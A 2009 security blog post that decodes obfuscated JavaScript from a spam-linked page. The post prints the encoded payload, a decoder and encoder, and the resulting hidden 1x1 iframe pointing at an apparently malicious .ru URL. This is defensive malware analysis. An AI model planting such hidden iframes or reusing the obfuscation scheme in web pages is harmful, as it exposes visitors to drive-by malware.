xorl %eax, %eax

Funny Spam Email


I received a cute spam email today. Its subject was “I watch after your PC” and its body contained only this:

Know any maps on-line?
http://stalker-vgpu.by.ru/demo.html

Of course, it hit an amazing 15.3 score in SpamAssassin, but it was still worth a closer look. The sending host, taken from the Received: header, was:

Received: from [190.246.47.14] (HELO 14-47-246-190.fibertel.com.ar)

So, I fetched that page with wget(1) and, not surprisingly, it was some obfuscated JavaScript code. After a couple of minutes of cleaning it up, the code was pretty easy to understand. The JavaScript section is composed of nine functions. Most of them contain a straightforward algorithm similar to this one:

function AEvZVPZNFD(LIFcfdLH)
{
	var int_three=3;
	var int_six=6;
	/* encoded payload (renamed to 'obfu'): "a,b" pairs separated by '-' */
	var obfu='49,3-30,3-19,3-52,0-58,0-58,0-56,0-29,0-23,3-23,3-49,0-50,3-48,3-58,3-58,0-60,3-54,3-55,3-50,0-48,3-23,0-57,0-58,3-23,3-58,0-50,3-54,3-56,0-54,0-48,3-58,0-50,3-57,3-23,3-52,3-55,0-50,0-50,3-60,0-23,0-56,0-52,0-56,0-19,3-31,0-30,0-23,3-52,3-51,0-57,0-';
	/* array of "a,b" strings; the trailing '-' leaves an empty last element */
	var deobfu=obfu.split('-');
	var string_ret='';
	/* length-1 skips that empty last element */
	for(var i=0; i<deobfu.length-1; i+=1)
	{ 
		var ArrayOne=deobfu[i].split(',');                                   /* ["a", "b"] */
		var retval = parseInt(ArrayOne[0]*int_six)+parseInt(ArrayOne[1]);  /* a*6 + b */
		retval = parseInt(retval)/int_three;                                 /* (a*6 + b)/3 = character code */
		string_ret += String.fromCharCode(retval);
	}

	return string_ret;
}

As you can see, it has a variable (which I renamed to ‘obfu’) holding a series of number pairs: the two numbers of a pair are separated by ‘,’ and consecutive pairs by ‘-‘. The next variable (which I renamed to ‘deobfu’) is simply that string split on ‘-‘ with split(), so it ends up as an array of “a,b” strings (the trailing ‘-‘ leaves an empty last element, which is why the loop stops at length-1).
The ‘for’ loop then visits each pair, splits it on ‘,’ and performs the following calculation on the two numbers a and b…

retval = (a * 6) + b;
retval = retval / 3;

The parseInt() calls in the original are effectively no-ops here, since the multiplication already coerces the strings to numbers. At last, it appends the result to ‘string_ret’ after converting the character code to a character with the fromCharCode() function. After decoding the strings of all the functions and concatenating the pieces, the result is this:

<!-- From MWmC() function -->
<iframe width=1 height=1 border=0 frameborder=0 sr
<!-- From AEvZVPZNFD() function -->
c='http://beautymoda.ru/templates/index.php'></ifr
<!-- From dHIw() function -->
ame>

So, it basically executes this:

<iframe width=1 height=1 border=0 frameborder=0 src='http://beautymoda.ru/templates/index.php'></iframe>
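As an added example (my own code, not the spam page's), here is a standalone Node.js decoder for the same “a,b-a,b-…” scheme, together with the matching encoder, which makes it obvious why the “multiply by six, divide by three” arithmetic works: (6a + b)/3 is just 2a + b/3, so with b restricted to 0 or 3 each pair is half the character code plus a parity flag. The page only shows the MWmC() and dHIw() fragments in decoded form, so their obfuscated strings are constructed here with the encoder; the AEvZVPZNFD() payload is copied verbatim from the function above. The iframe extractor at the end is also my addition.

```javascript
// Added example, not code from the spam page: standalone decoder/encoder for
// the number-pair scheme used by the nine functions. Node.js, no dependencies.

// Decode one obfuscated string. Every '-'-separated element is "a,b" and the
// character code is (a*6 + b)/3, exactly what the original loop computes.
function decodePairs(obfu) {
  return obfu
    .split("-")
    .filter((pair) => pair.length > 0) // the payload ends with a dangling '-'
    .map((pair) => {
      const [a, b] = pair.split(",").map(Number);
      const code = (a * 6 + b) / 3;
      if (!Number.isInteger(code)) {
        throw new Error(`bad pair "${pair}"`);
      }
      return String.fromCharCode(code);
    })
    .join("");
}

// The inverse. (6a + b)/3 = 2a + b/3, so with b in {0, 3} a pair is simply
// (floor(code/2), 3 * (code mod 2)): half the code plus a parity flag.
// That is all the "*6 then /3" arithmetic hides.
function encodePairs(text) {
  let out = "";
  for (const ch of text) {
    const code = ch.charCodeAt(0);
    out += `${Math.floor(code / 2)},${(code % 2) * 3}-`;
  }
  return out;
}

// Payload of AEvZVPZNFD(), copied from the page.
const OBFU_AEVZVPZNFD =
  "49,3-30,3-19,3-52,0-58,0-58,0-56,0-29,0-23,3-23,3-49,0-50,3-48,3-58,3-58,0-60,3-54,3-55,3-50,0-48,3-23,0-57,0-58,3-23,3-58,0-50,3-54,3-56,0-54,0-48,3-58,0-50,3-57,3-23,3-52,3-55,0-50,0-50,3-60,0-23,0-56,0-52,0-56,0-19,3-31,0-30,0-23,3-52,3-51,0-57,0-";

// The page shows the MWmC() and dHIw() fragments only decoded, so their
// obfuscated strings are constructed here (assumption: same scheme).
const OBFU_MWMC = encodePairs("<iframe width=1 height=1 border=0 frameborder=0 sr");
const OBFU_DHIW = encodePairs("ame>");

// List every iframe src in a chunk of HTML: the piece an analyst actually
// wants from a page like this, without ever rendering it in a browser.
function extractIframeSrcs(html) {
  const srcs = [];
  const re = /<iframe\b[^>]*\bsrc=['"]([^'"]+)['"]/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    srcs.push(m[1]);
  }
  return srcs;
}

// Reassemble the fragments in the order the functions emit them.
function decodeLanding() {
  const html = [OBFU_MWMC, OBFU_AEVZVPZNFD, OBFU_DHIW].map(decodePairs).join("");
  return { html, srcs: extractIframeSrcs(html) };
}

if (typeof require !== "undefined" && require.main === module) {
  const { html, srcs } = decodeLanding();
  console.log(html);
  console.log("iframe targets:", srcs);
}
```

Splitting the markup across several functions (note the `sr` / `c=` break right inside the `src` attribute) is what keeps a naive grep for `<iframe` or the landing URL from matching the raw page; decoding and concatenating first, then searching, is the only reliable way to extract the target.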

Unfortunately, it seems that it had already been reported to the hosting provider, since the above URL now redirects to ‘https://best-hoster.ru/suspend/’, which indicates that the website has been suspended.

Written by xorl

November 7, 2009 at 01:18

Posted in fun
